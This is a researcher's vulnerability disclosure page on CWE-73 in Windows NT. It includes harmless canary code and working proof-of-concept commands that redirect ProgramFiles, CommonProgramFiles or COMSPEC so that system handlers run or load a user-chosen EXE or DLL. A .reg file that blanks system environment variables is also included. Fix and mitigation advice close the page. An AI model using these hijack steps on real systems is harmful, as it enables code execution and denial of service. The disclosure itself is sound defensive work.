Me, myself & IT

About 20,000 Instances of CWE-73 in all Versions of Microsoft^® Windows^™NT

Purpose
Reason
Canaries
Exploits (Proofs of Concept): Variant 1; Variant 2a; Variant 2b; Variant 3a; Variant 3b; Variant 4; Variant 5; Variant 6
Fix
Mitigation

Purpose

Demonstrate just some vulnerabilities of Microsoft Windows NT, present only due to the abundant (ab)use of environment variables in (registered) pathnames of executable files – a well-known weakness, documented as CWE-73: External Control of File Name or Path in the CWE^™, which allows well-known attacks like CAPEC-13: Subverting Environment Variable Values documented in the CAPEC^™.

Reason

###

VER
REG.exe QUERY HKEY_LOCAL_MACHINE /C /D /F :\ /S
REG.exe QUERY HKEY_LOCAL_MACHINE /C /D /F %*^%\ /S

Note: the command lines can be copied and pasted as block into a Command Processor window.

Microsoft Windows [Version 10.0.26100.1150]

[…]

End of search: 23678 match(es) found.

[…]

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.contact\ShellNew
    command    REG_EXPAND_SZ    "%programFiles%\Windows Mail\Wab.exe" /CreateContact "%1"
    iconpath    REG_EXPAND_SZ    %ProgramFiles%\Windows Mail\wab.exe,1

[…]

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\runas\command
    (Default)    REG_EXPAND_SZ    %SystemRoot%\System32\cmd.exe /C "%1" %*

[…]

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\certificate_wab_auto_file\DefaultIcon
    (Default)    REG_EXPAND_SZ    %ProgramFiles%\Windows Mail\wab.exe,1

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\certificate_wab_auto_file\shell\open\command
    (Default)    REG_EXPAND_SZ    "%ProgramFiles%\Windows Mail\wab.exe" /certificate "%1"

[…]

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\runas\command
    (Default)    REG_EXPAND_SZ    %SystemRoot%\System32\cmd.exe /C "%1" %*

[…]

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\contact_wab_auto_file\DefaultIcon
    (Default)    REG_EXPAND_SZ    %ProgramFiles%\Windows Mail\wab.exe,1

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\contact_wab_auto_file\shell\open\command
    (Default)    REG_EXPAND_SZ    "%ProgramFiles%\Windows Mail\wab.exe" /contact "%1"

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\contact_wab_auto_file\shell\print\command
    (Default)    REG_EXPAND_SZ    "%ProgramFiles%\Windows Mail\wab.exe" /Print "%1"

[…]

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cplfile\shell\runas\command
    (Default)    REG_EXPAND_SZ    %SystemRoot%\System32\rundll32.exe shell32.dll,Control_RunDLLAsUser "%1",%*

[…]

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\group_wab_auto_file\DefaultIcon
    (Default)    REG_EXPAND_SZ    %ProgramFiles%\Windows Mail\wab.exe,2

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\group_wab_auto_file\shell\edit\command
    (Default)    REG_EXPAND_SZ    "%ProgramFiles%\Windows Mail\wab.exe" /Group "%1"

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\group_wab_auto_file\shell\open\command
    (Default)    REG_EXPAND_SZ    "%ProgramFiles%\Windows Mail\wab.exe" /Group "%1"

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\group_wab_auto_file\shell\print\command
    (Default)    REG_EXPAND_SZ    "%ProgramFiles%\Windows Mail\wab.exe" /Print "%1"

[…]

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\LDAP\shell\open\command
    (Default)    REG_EXPAND_SZ    "%ProgramFiles%\Windows Mail\wab.exe" "/ldap:%1"

[…]

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mscfile\shell\runas\command
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\mmc.exe "%1" %*

[…]

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\vcard_wab_auto_file\DefaultIcon
    (Default)    REG_EXPAND_SZ    %ProgramFiles%\Windows Mail\wab.exe,1

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\vcard_wab_auto_file\shell\open\command
    (Default)    REG_EXPAND_SZ    "%ProgramFiles%\Windows Mail\wab.exe" /vcard "%1"

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WAB.AssocProtocol.LDAP\shell\open\command
    (Default)    REG_EXPAND_SZ    "%ProgramFiles%\Windows Mail\wab.exe" "/ldap:%1"

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wab_auto_file\DefaultIcon
    (Default)    REG_EXPAND_SZ    %ProgramFiles%\Windows Mail\wab.exe,10

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wab_auto_file\shell\open\command
    (Default)    REG_EXPAND_SZ    "%ProgramFiles%\Windows Mail\wab.exe" /Import "%1"

[…]

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\licensemanagershellext.exe
    (Default)    REG_EXPAND_SZ    %SystemRoot%\System32\licensemanagershellext.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\PowerShell.exe
    (Default)    REG_EXPAND_SZ    %SystemRoot%\system32\WindowsPowerShell\v1.0\PowerShell.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\TabTip.exe
    (Default)    REG_EXPAND_SZ    %CommonProgramFiles%\microsoft shared\ink\TabTip.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\wab.exe
    (Default)    REG_EXPAND_SZ    %ProgramFiles%\Windows Mail\wab.exe
    Path    REG_EXPAND_SZ    ProgramFiles%\Windows Mail

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\wabmig.exe
    (Default)    REG_EXPAND_SZ    %ProgramFiles%\Windows Mail\wabmig.exe

[…]

HKEY_LOCAL_MACHINE\Software\Microsoft\WAB\DLLPath
    (Default)    REG_EXPAND_SZ    %CommonProgramFiles%\System\wab32.dll

[…]

End of search: 25325 match(es) found.

Note: since REG.exe follows symbolic links, the number of matches exceeds the number of registry entries with environment variables in pathnames.

Canaries

Perform the following 2 simple steps to build 2 canaries for use in the exploits respectively proofs of concept presented below: an application cwe-73.exe which displays a message box with its own fully-qualified pathname as title and the command line as text plus a DLL cwe-73.dll which displays a message box with its own fully-qualified pathname as title and the one of its calling application as text.

Create the text file cwe-73.c with the following content in an arbitrary, preferable empty directory:

// Copyright © 2004-2025, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

#define STRICT
#define UNICODE
#define WIN32_LEAN_AND_MEAN

#include <windows.h>

#ifndef _DLL
__declspec(noreturn)
VOID	CDECL	wWinMainCRTStartup(VOID)
{
	WCHAR	szProcess[MAX_PATH];
	DWORD	dwProcess = GetModuleFileName((HMODULE) NULL,
		                              szProcess,
		                              sizeof(szProcess) / sizeof(*szProcess));

	if (dwProcess < sizeof(szProcess) / sizeof(*szProcess))
		szProcess[dwProcess] = L'\0';

	ExitProcess(MessageBoxEx(HWND_DESKTOP,
	                         GetCommandLine(),
	                         szProcess,
	                         MB_OK,
	                         MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT)));
}
#else // _DLL
__declspec(safebuffers)
BOOL	WINAPI	_DllMainCRTStartup(HMODULE hModule,
		                   DWORD   dwReason,
		                   LPVOID  lpReserved)
{
	WCHAR	szModule[MAX_PATH];
	DWORD	dwModule = GetModuleFileName(hModule,
		                             szModule,
		                             sizeof(szModule) / sizeof(*szModule));
	WCHAR	szProcess[MAX_PATH];
	DWORD	dwProcess = GetModuleFileName((HMODULE) NULL,
		                              szProcess,
		                              sizeof(szProcess) / sizeof(*szProcess));
	if (dwReason != DLL_PROCESS_ATTACH)
		return FALSE;

	if (!DisableThreadLibraryCalls(hModule))
		return FALSE;

	if (dwModule < sizeof(szModule) / sizeof(*szModule))
		szModule[dwModule] = L'\0';

	if (dwProcess < sizeof(szProcess) / sizeof(*szProcess))
		szProcess[dwProcess] = L'\0';

	return IDOK == MessageBoxEx(HWND_DESKTOP,
	                            szProcess,
	                            szModule,
	                            MB_OKCANCEL,
	                            MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT));
}
#endif // _DLL

MAKELANGID MAKELANGID

Build the application cwe-73.exe and the DLL cwe-73.dll from the source file cwe-73.c created in step 1.:

SET CL=/GAFy /Oisy /W4 /Zl
SET LINK=/ENTRY:wWinMainCRTStartup /NODEFAULTLIB /SUBSYSTEM:Windows
CL.EXE cwe-73.c kernel32.lib user32.lib
SET LINK=/NODEFAULTLIB
CL.EXE /LD /MD cwe-73.c kernel32.lib user32.lib

For details and reference see the MSDN articles Compiler Options and Linker Options.

Note: if necessary, see the MSDN article Use the Microsoft C++ toolset from the command line for an introduction.

Note: cwe-73.dll and cwe-73.exe are pure Win32 executables and build without the MSVCRT libraries.

Note: the command lines can be copied and pasted as block into a Command Processor window.

Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 16.00.40219.01 for 80x86
Copyright (C) Microsoft Corporation.  All rights reserved.

cwe-73.c

Microsoft (R) Incremental Linker Version 10.00.40219.386
Copyright (C) Microsoft Corporation.  All rights reserved.

/ENTRY:wWinMainCRTStartup /NODEFAULTLIB /SUBSYSTEM:Windows
/out:cwe-73.exe
cwe-73.obj
kernel32.lib
user32.lib

Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 16.00.40219.01 for 80x86
Copyright (C) Microsoft Corporation.  All rights reserved.

cwe-73.c
cwe-73.C(31) : warning C4100: 'lpReserved' : unreferenced formal parameter

Microsoft (R) Incremental Linker Version 10.00.40219.386
Copyright (C) Microsoft Corporation.  All rights reserved.

/NODEFAULTLIB
/out:cwe-73.dll
/dll
/implib:cwe-73.lib
cwe-73.obj
kernel32.lib
user32.lib

Exploits (Proofs of Concept)

The following exploits respectively proofs of concept demonstrate multiple attack variants and vulnerabilities:
• (registered) command lines which reference executable files via environment variables are vulnerable to the attack variants 1, 2a, 2b, 3a and 3b;
• executable files which load and execute (other) executable files via (registered) pathnames that reference environment variables are vulnerable to the attack variants 4 and 5!

Variant 1

Perform the following 4 simple steps to show an example of the first attack variant and demonstrate the vulnerability on Windows NT4 and later versions of Windows NT.

Logon as unprivileged standard user and start the Command Processor in the directory where you built the canary application cwe-73.exe.
Display the command line registered for the LDAP URL protocol handler:
```
FTYPE ldap
```
On Windows NT4, Windows 2000, Windows XP and Windows 2003 this yields:
```
ldap="%ProgramFiles%\Outlook Express\wab.exe" "/ldap:%1"
```
On Windows Vista and later versions this yields:
```
ldap="%ProgramFiles%\Windows Mail\wab.exe" "/ldap:%1"
```
Start the LDAP URL protocol handler to show the expected (normal) behaviour:
```
START ldap://localhost
```
Set the environment variable ProgramFiles to the value %CD%\cwe-73.exe" " and start the LDAP URL protocol handler again:
```
SET ProgramFiles=%CD%\cwe-73.exe" "
START ldap://localhost
```
OUCH: due to the vulnerable command line registered for the LDAP URL protocol handler on Windows NT4 and later versions, an arbitrary application can be started from any user-controlled directory!

Note: a repetition with the environment variable ProgramFiles set to a value \\‹computer›\‹share›\‹filename›.‹extension›" " or http://‹host›/‹WebDAV path›/‹filename›.‹extension›" ", i.e. the remote UNC or WebDAV pathname of an arbitrary application followed by " ", is left as an exercise to the reader!

Variant 2a

Perform the following 4 simple steps to show an example of the second attack variant and demonstrate the vulnerability on Windows NT4, Windows 2000, Windows XP and Windows 2003.

Logon as unprivileged standard user and start the Command Processor in the directory where you built the canary application cwe-73.exe.
Set the environment variable ProgramFiles to the pathname of an arbitrary user-writable directory, create the subdirectory \Outlook Express\ there and copy the canary application cwe-73.exe as WAB.exe into this subdirectory:
```
SET ProgramFiles=%CD%
MKDIR "%ProgramFiles%\Outlook Express"
COPY cwe-73.exe "%ProgramFiles%\Outlook Express\WAB.exe"
```
Note: the command lines can be copied and pasted as block into a Command Processor window.
```
        1 file(s) copied.
```
Start the LDAP URL protocol handler:
```
START ldap://localhost
```
OUCH: due to the vulnerable command line registered for the LDAP URL protocol handler on Windows NT4 and later versions, an arbitrary application WAB.exe can be started from any user-controlled directory!
Display the file types associated with the file extensions .contact, .group, .p7c, .vcf and .wab, then create (empty) files with these extensions in an arbitrary user-writable directory and open them:
```
FOR %? IN (.contact .group .p7c .vcf .wab) DO (
ASSOC %?
COPY NUL: "%CD%\%?" && START "%?" /WAIT "%CD%\%?"
ERASE "%CD%\%?")
```
Note: the command lines can be copied and pasted as block into a Command Processor window.
Note: START … ‹pathname›.‹extension› is equivalent to a double-click on the file ‹pathname›.‹extension› in File Explorer!
```
.contact=contact_wab_auto_file
        1 file(s) copied.
.group=group_wab_auto_file
        1 file(s) copied.
.p7c=certificate_wab_auto_file
        1 file(s) copied.
.vcf=vcard_wab_auto_file
        1 file(s) copied.
.wab=wab_auto_file
        1 file(s) copied.
```
OUCH: due to the vulnerable command lines registered for the file types associated with the file extensions .contact, .group, .p7c, .vcf and .wab on Windows NT4 and later versions, an arbitrary application WAB.exe can be started from any user-controlled directory!

Variant 2b

Perform the following 4 simple steps to show another example of the second attack variant and demonstrate the vulnerability on Windows Vista as well as later versions of Windows NT.

Logon as unprivileged standard user and start the Command Processor in the directory where you built the canary application cwe-73.exe.
Set the environment variable ProgramFiles to the pathname of an arbitrary user-writable directory, create the subdirectory \Windows Mail\ there and a hardlink of the canary application cwe-73.exe as WAB.exe in the latter:
```
SET ProgramFiles=%CD%
MKDIR "%ProgramFiles%\Windows Mail"
MKLINK /H "%ProgramFiles%\Windows Mail\WAB.exe" cwe-73.exe
```
Note: the command lines can be copied and pasted as block into a Command Processor window.
```
Hardlink created for C:\Users\Stefan\CWE-73\Windows Mail\WAB.exe <<===>> C:\Users\Stefan\CWE-73\cwe-73.exe
```
Start the LDAP URL protocol handler:
```
START ldap://localhost
```
OUCH: due to the vulnerable command line registered for the LDAP URL protocol handler on Windows NT4 and later versions, an arbitrary application WAB.exe can be started from any user-controlled directory!
Display the file types associated with the file extensions .contact, .group, .p7c, .vcf and .wab, then create (empty) files with these extensions in an arbitrary user-writable directory and open them:
```
FOR %? IN (.contact .group .p7c .vcf .wab) DO (
ASSOC %?
COPY NUL: "%CD%\%?" && START "%?" /WAIT "%CD%\%?"
ERASE "%CD%\%?")
```
Note: the command lines can be copied and pasted as block into a Command Processor window.
Note: START … ‹pathname›.‹extension› is equivalent to a double-click on the file ‹pathname›.‹extension› in File Explorer!
```
.contact=contact_wab_auto_file
        1 file(s) copied.
.group=group_wab_auto_file
        1 file(s) copied.
.p7c=certificate_wab_auto_file
        1 file(s) copied.
.vcf=vcard_wab_auto_file
        1 file(s) copied.
.wab=wab_auto_file
        1 file(s) copied.
```
OUCH: due to the vulnerable command lines registered for the file types associated with the file extensions .contact, .group, .p7c, .vcf and .wab on Windows NT4 and later versions, an arbitrary application WAB.exe can be started from any user-controlled directory!

Variant 3a

Perform the following 3 simple steps to show an example of the third attack variant and demonstrate the vulnerability on Windows NT4, Windows 2000, Windows XP and Windows 2003.

Logon as unprivileged standard user and start the Command Processor in the directory where you built the canary application cwe-73.exe.
Set the environment variable ProgramFiles to the pathname of an arbitrary user-writable directory, create the subdirectory \Outlook Express\ there and copy the canary application cwe-73.exe as WAB.exe into this subdirectory:
```
SET ProgramFiles=%CD%
MKDIR "%ProgramFiles%\Outlook Express"
COPY cwe-73.exe "%ProgramFiles%\Outlook Express\WAB.exe"
```
Note: the command lines can be copied and pasted as block into a Command Processor window.
```
        1 file(s) copied.
```
Start the Windows Address Book application:
```
START WAB
```
OUCH: due to the vulnerable pathname of the Windows Address Book application registered below the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths registry key on Windows NT4 and later versions, an arbitrary application WAB.exe can be started from any user-controlled directory!

Variant 3b

Perform the following 3 simple steps to show another example of the second attack variant and demonstrate the vulnerability on Windows Vista as well as later versions of Windows NT.

Logon as unprivileged standard user and start the Command Processor in the directory where you built the canary application cwe-73.exe.
Set the environment variable ProgramFiles to the pathname of an arbitrary user-writable directory, create the subdirectory \Windows Mail\ there and a hardlink of the canary application cwe-73.exe as WAB.exe in the latter:
```
SET ProgramFiles=%CD%
MKDIR "%ProgramFiles%\Windows Mail"
MKLINK /H "%ProgramFiles%\Windows Mail\WAB.exe" cwe-73.exe
```
Note: the command lines can be copied and pasted as block into a Command Processor window.
```
Hardlink created for C:\Users\Stefan\CWE-73\Windows Mail\WAB.exe <<===>> C:\Users\Stefan\CWE-73\cwe-73.exe
```
Start the Windows Contacts application:
```
START WAB
```
OUCH: due to the vulnerable pathname of the Windows Contacts application registered below the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths registry key on Windows Vista and later versions, an arbitrary application WAB.exe can be started from any user-controlled directory!

Variant 4

Perform the following 2 simple steps to show an example of the fourth attack variant and demonstrate the vulnerability on all versions of Windows NT.

Logon as unprivileged standard user and start the Command Processor in the directory where you built the 32-bit canary DLL cwe-73.dll.
Set the environment variable CommonProgramFiles – and CommonProgramFiles(x86) too if it exists – to the pathname of an arbitrary user-writable directory, then create a subdirectory \System\ there, copy the canary DLL cwe-73.dll for the 32-bit execution environment as WAB32.dll into this subdirectory and execute the 32-bit application WAB.exe, i.e. %ProgramFiles(x86)%\Outlook Express\WAB.exe respectively %ProgramFiles(x86)%\Windows Mail\WAB.exe if the environment variable ProgramFiles(x86) exists, else %ProgramFiles%\Outlook Express\WAB.exe respectively %ProgramFiles%\Windows Mail\WAB.exe:
```
SET CommonProgramFiles=%CD%
IF DEFINED CommonProgramFiles(x86) SET CommonProgramFiles(x86)=%CD%
MKDIR System
COPY cwe-73.dll System\WAB32.dll
IF NOT DEFINED ProgramFiles(x86) (IF EXIST "%ProgramFiles%\Outlook Express\WAB.exe" "%ProgramFiles%\Outlook Express\WAB.exe") ELSE IF EXIST "%ProgramFiles(x86)%\Outlook Express\WAB.exe" "%ProgramFiles(x86)%\Outlook Express\WAB.exe"
IF NOT DEFINED ProgramFiles(x86) (IF EXIST "%ProgramFiles%\Windows Mail\WAB.exe" "%ProgramFiles%\Windows Mail\WAB.exe") ELSE IF EXIST "%ProgramFiles(x86)%\Windows Mail\WAB.exe" "%ProgramFiles(x86)%\Windows Mail\WAB.exe"
```
Note: the command lines can be copied and pasted as block into a Command Processor window.
```
        1 file(s) copied.
```
OUCH: due to the vulnerable registered pathname %CommonProgramFiles%\System\wab32.dll respectively %CommonProgramFiles(x86)%\System\wab32.dll on Windows NT4 and later versions, the applications %ProgramFiles%\Outlook Express\WAB.exe, %ProgramFiles(x86)%\Outlook Express\WAB.exe, %ProgramFiles%\Windows Mail\WAB.exe and %ProgramFiles(x86)%\Windows Mail\WAB.exe can load and execute an arbitrary DLL WAB32.dll from any user-controlled directory!

Note: modification of this proof of concept for the 64-bit execution environment is left as an exercise to the reader!

Variant 5

Perform the following 7 simple steps to show an example of the fifth attack variant and demonstrate the vulnerability on all versions of Windows NT.

Logon as unprivileged standard user and start the Command Processor in the directory where you built the canary application cwe-73.exe.
Set the environment variable COMSPEC to the pathname of the canary application cwe-73.exe, then execute two (or more) arbitrary internal commands in a pipeline:
```
SET COMSPEC=%CD%\cwe-73.exe
DPATH | KEYS
```
Note: DPATH and KEYS are undocumented internal commands.
OUCH: for each internal command of a pipeline, the vulnerable Command Processor starts the program whose pathname is set in the user-controlled environment variable COMSPEC instead of another instance of itself!
Execute arbitrary command lines via the internal FOR command, which according to its documentation passes the former to a Cmd.exe child process:
```
SETLOCAL ENABLEEXTENSIONS
FOR /F %? IN ('DPATH') DO @ECHO %?
FOR /F "Delims= UseBackQ" %? IN (`ECHO %CMDCMDLINE^%`) DO @ECHO %?
```
Note: the command lines can be copied and pasted as block into a Command Processor window.
```
DPATH=(null)
C:\Windows\system32\cmd.exe /c ECHO %CMDCMDLINE%
```
Note: contrary to the (mis)behaviour shown in other steps, here the child process’ Cmd.exe is not located via the environment variable COMSPEC!
Start an arbitrary internal command via the internal START command:
```
START EXIT
```
OUCH: for internal commands executed via the internal START command, the vulnerable Command Processor starts the program whose pathname is set in the user-controlled environment variable COMSPEC instead of another instance of itself!
Display the command lines registered for batch scripts, then create (empty) files .bat and .cmd in an arbitrary user-writable directory and open them both:
```
ASSOC .bat
FTYPE batfile
ASSOC .cmd
FTYPE cmdfile
FOR %? IN (.bat .cmd) DO (
COPY NUL: "%CD%\%?" && START "%?" /WAIT "%CD%\%?"
ERASE "%CD%\%?")
```
Note: the command lines can be copied and pasted as block into a Command Processor window.
Note: the command line START … ‹pathname›.‹extension› is equivalent to a double-click on the file ‹pathname›.‹extension› in File Explorer!
```
.bat=batfile
batfile="%1" %*
.cmd=cmdfile
cmdfile="%1" %*
        1 file(s) copied.
        1 file(s) copied.
```
OUCH: for batch scripts, the vulnerable Command Processor starts the program whose pathname is set in the user-controlled environment variable COMSPEC instead of another instance of itself!
Remove the environment variable COMSPEC, then start an arbitrary internal command, create (empty) files .bat and .cmd in an arbitrary user-writable directory and open them both:
```
SET COMSPEC=
START EXIT
FOR %? IN (.bat .cmd) DO (
COPY NUL: "%CD%\%?" && START "%?" /WAIT "%CD%\%?"
ERASE "%CD%\%?")
```
Note: the command lines can be copied and pasted as block into a Command Processor window.
```
The COMSPEC environment variable does not point to CMD.EXE.
        1 file(s) copied.
The COMSPEC environment variable does not point to CMD.EXE.
        1 file(s) copied.
The COMSPEC environment variable does not point to CMD.EXE.
```
OUCH: the vulnerable Command Processor fails and prints an error message if the user-controlled environment variable COMSPEC is not present!
Finally execute an arbitrary internal command in a pipeline:
```
"%SystemRoot%\System32\WinVer.exe" | EXIT
```
OUCH: for each internal command in a pipeline, the vulnerable Command Processor crashes with an access violation exception 0xC0000005 reading address NULL if the user-controlled environment variable COMSPEC is not present!
Note: the crash induced by the absence of the environment variable COMSPEC is another well-known weakness, documented as CWE-248: Uncaught Exception and CWE-476: NULL Pointer Dereference in the CWE^™.
Note: properly implemented, the Command Processor would not (ab)use the value of the environment variable COMSPEC to execute internal commands in the child processes of pipelines or with its internal START command, but evaluate its own pathname with the Win32 function GetModuleFileName() instead!

Variant 6

Perform the following ?? simple steps to show an example of the sixth attack variant and demonstrate the vulnerability on all versions of Windows NT.

Logon as unprivileged standard user and start the Command Processor Cmd.exe, then create the text file cwe-73.reg with the following content in an arbitrary directory:

REGEDIT4

; Copyright © 2000-2025, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[HKEY_CURRENT_USER\Environment]
"ALLUSERSPROFILE"=""
"APPDATA"=""
"COMSPEC"=""
"CommonProgramFiles"=""
"CommonProgramFiles(x86)"=""
"CommonProgramW6432"=""
"DriverData"=""
"HOMEDRIVE"=""
"HOMEPATH"=""
"LOCALAPPDATA"=""
"PATH"=""
"PATHEXT"=""
"ProgramData"=""
"ProgramFiles"=""
"ProgramFiles(x86)"=""
"ProgramW6432"=""
"PUBLIC"=""
"PSModulePath"=""
"SystemDrive"=""
"SystemRoot"=""
"TEMP"=""
"TMP"=""
"USERPROFILE"=""
"windir"=""

Note: if necessary, see the MSKB article 310516.

Double-click the file cwe-73.reg in File Explorer to import its content into the Registry branch of your user account.

Fix

Never reference environment variables in pathnames!

Replace them all during system or product installation with their values – the dynamic (system) environment variables CommonProgramFiles, CommonProgramFiles(x86), CommonProgramW6432, ProgramData alias ALLUSERSPROFILE, ProgramFiles, ProgramFiles(x86), ProgramW6432, SystemDrive, SystemRoot plus windir don’t change after system installation, and the dynamic (user) environment variables APPDATA, LOCALAPPDATA plus USERPROFILE don’t change after user-profile creation – or evaluate their pathnames via the GetAllUsersProfileDirectory(), GetSystemDirectory(), GetSystemWindowsDirectory(), GetSystemWow64Directory(), GetUserProfileDirectory(), GetWindowsDirectory(), SHGetFolderPath() and SHGetKnownFolderPath() functions! GetDefaultUserProfileDirectory() GetProfilesDirectory()

Note: if Microsoft were really serious with their Trustworthy Computing initiative, started in 2002 after Bill Gates’ memo, they would already have fixed their products and also banned the use of environment variables to locate executable files at all!

From: Bill Gates
Sent: Tuesday, January 15, 2002 5:22 PM
To: Microsoft and Subsidiaries: All FTE
Subject: Trustworthy computing
Every few years I have sent out a memo talking about the highest priority for Microsoft. Two years ago, it was the kickoff of our .NET strategy. Before that, it was several memos about the importance of the Internet to our future and the ways we could make the Internet truly useful for people. Over the last year it has become clear that ensuring .NET is a platform for Trustworthy Computing is more important than any other part of our work. If we don't do this, people simply won't be willing -- or able -- to take advantage of all the other great work we do. Trustworthy Computing is the highest priority for all the work we are doing. We must lead the industry to a whole new level of Trustworthiness in computing.
When we started work on Microsoft .NET more than two years ago, we set a new direction for the company -- and articulated a new way to think about our software. Rather than developing standalone applications and Web sites, today we're moving towards smart clients with rich user interfaces interacting with Web services. We're driving the XML Web services standards so that systems from all vendors can share information, while working to make Windows the best client and server for this new era.
There is a lot of excitement about what this architecture makes possible. It allows the dreams about e-business that have been hyped over the last few years to become a reality. It enables people to collaborate in new ways, including how they read, communicate, share annotations, analyze information and meet.
However, even more important than any of these new capabilities is the fact that it is designed from the ground up to deliver Trustworthy Computing. What I mean by this is that customers will always be able to rely on these systems to be available and to secure their information. Trustworthy Computing is computing that is as available, reliable and secure as electricity, water services and telephony.
Today, in the developed world, we do not worry about electricity and water services being available. With telephony, we rely both on its availability and its security for conducting highly confidential business transactions without worrying that information about who we call or what we say will be compromised. Computing falls well short of this, ranging from the individual user who isn't willing to add a new application because it might destabilize their system, to a corporation that moves slowly to embrace e-business because today's platforms don't make the grade.
The events of last year -- from September's terrorist attacks to a number of malicious and highly publicized computer viruses -- reminded every one of us how important it is to ensure the integrity and security of our critical infrastructure, whether it's the airlines or computer systems.
Computing is already an important part of many people's lives. Within 10 years, it will be an integral and indispensable part of almost everything we do. Microsoft and the computer industry will only succeed in that world if CIOs, consumers and everyone else sees that Microsoft has created a platform for Trustworthy Computing.
Every week there are reports of newly discovered security problems in all kinds of software, from individual applications and services to Windows, Linux, Unix and other platforms. We have done a great job of having teams work around the clock to deliver security fixes for any problems that arise. Our responsiveness has been unmatched -- but as an industry leader we can and must do better. Our new design approaches need to dramatically reduce the number of such issues that come up in the software that Microsoft, its partners and its customers create. We need to make it automatic for customers to get the benefits of these fixes. Eventually, our software should be so fundamentally secure that customers never even worry about it.
No Trustworthy Computing platform exists today. It is only in the context of the basic redesign we have done around .NET that we can achieve this. The key design decisions we made around .NET include the advances we need to deliver on this vision. Visual Studio .NET is the first multi-language tool that is optimized for the creation of secure code, so it is a key foundation element.
I've spent the past few months working with Craig Mundie's group and others across the company to define what achieving Trustworthy Computing will entail, and to focus our efforts on building trust into every one of our products and services. Key aspects include:
Availability: Our products should always be available when our customers need them. System outages should become a thing of the past because of a software architecture that supports redundancy and automatic recovery. Self-management should allow for service resumption without user intervention in almost every case.
Security: The data our software and services store on behalf of our customers should be protected from harm and used or modified only in appropriate ways. Security models should be easy for developers to understand and build into their applications.
Privacy: Users should be in control of how their data is used. Policies for information use should be clear to the user. Users should be in control of when and if they receive information to make best use of their time. It should be easy for users to specify appropriate use of their information including controlling the use of email they send.
Trustworthiness is a much broader concept than security, and winning our customers' trust involves more than just fixing bugs and achieving "five-nines" availability. It's a fundamental challenge that spans the entire computing ecosystem, from individual chips all the way to global Internet services. It's about smart software, services and industry-wide cooperation.
There are many changes Microsoft needs to make as a company to ensure and keep our customers' trust at every level -- from the way we develop software, to our support efforts, to our operational and business practices. As software has become ever more complex, interdependent and interconnected, our reputation as a company has in turn become more vulnerable. Flaws in a single Microsoft product, service or policy not only affect the quality of our platform and services overall, but also our customers' view of us as a company.
In recent months, we've stepped up programs and services that help us create better software and increase security for our customers. Last fall, we launched the Strategic Technology Protection Program, making software like IIS and Windows .NET Server secure by default, and educating our customers on how to get -- and stay -- secure. The error-reporting features built into Office XP and Windows XP are giving us a clear view of how to raise the level of reliability. The Office team is focused on training and processes that will anticipate and prevent security problems.
In December, the Visual Studio .NET team conducted a comprehensive review of every aspect of their product for potential security issues. We will be conducting similarly intensive reviews in the Windows division and throughout the company in the coming months.
At the same time, we're in the process of training all our developers in the latest secure coding techniques. We've also published books like Writing Secure Code, by Michael Howard and David LeBlanc, which gives all developers the tools they need to build secure software from the ground up. In addition, we must have even more highly trained sales, service and support people, along with offerings such as security assessments and broad security solutions. I encourage everyone at Microsoft to look at what we've done so far and think about how they can contribute.
But we need to go much further.
In the past, we've made our software and services more compelling for users by adding new features and functionality, and by making our platform richly extensible. We've done a terrific job at that, but all those great features won't matter unless customers trust our software.
So now, when we face a choice between adding features and resolving security issues, we need to choose security. Our products should emphasize security right out of the box, and we must constantly refine and improve that security as threats evolve. A good example of this is the changes we made in Outlook to avoid e-mail-borne viruses. If we discover a risk that a feature could compromise someone's privacy, that problem gets solved first. If there is any way we can better protect important data and minimize downtime, we should focus on this. These principles should apply at every stage of the development cycle of every kind of software we create, from operating systems and desktop applications to global Web services.
Going forward, we must develop technologies and policies that help businesses better manage ever larger networks of PCs, servers and other intelligent devices, knowing that their critical business systems are safe from harm. Systems will have to become self-managing and inherently resilient. We need to prepare now for the kind of software that will make this happen, and we must be the kind of company that people can rely on to deliver it.
This priority touches on all the software work we do. By delivering on Trustworthy Computing, customers will get dramatically more value out of our advances than they have in the past. The challenge here is one that Microsoft is uniquely suited to solve.
More discussion of our vision for Trustworthy Computing is in the internal white paper.
Bill

Mitigation

Use SAFER alias Software Restrictions Policies, AppLocker or Windows Defender Application Control to prevent execution in all user-writable directories.

CAVEAT: this mitigation does not stop Denial of Service attacks!

Contact and Feedback

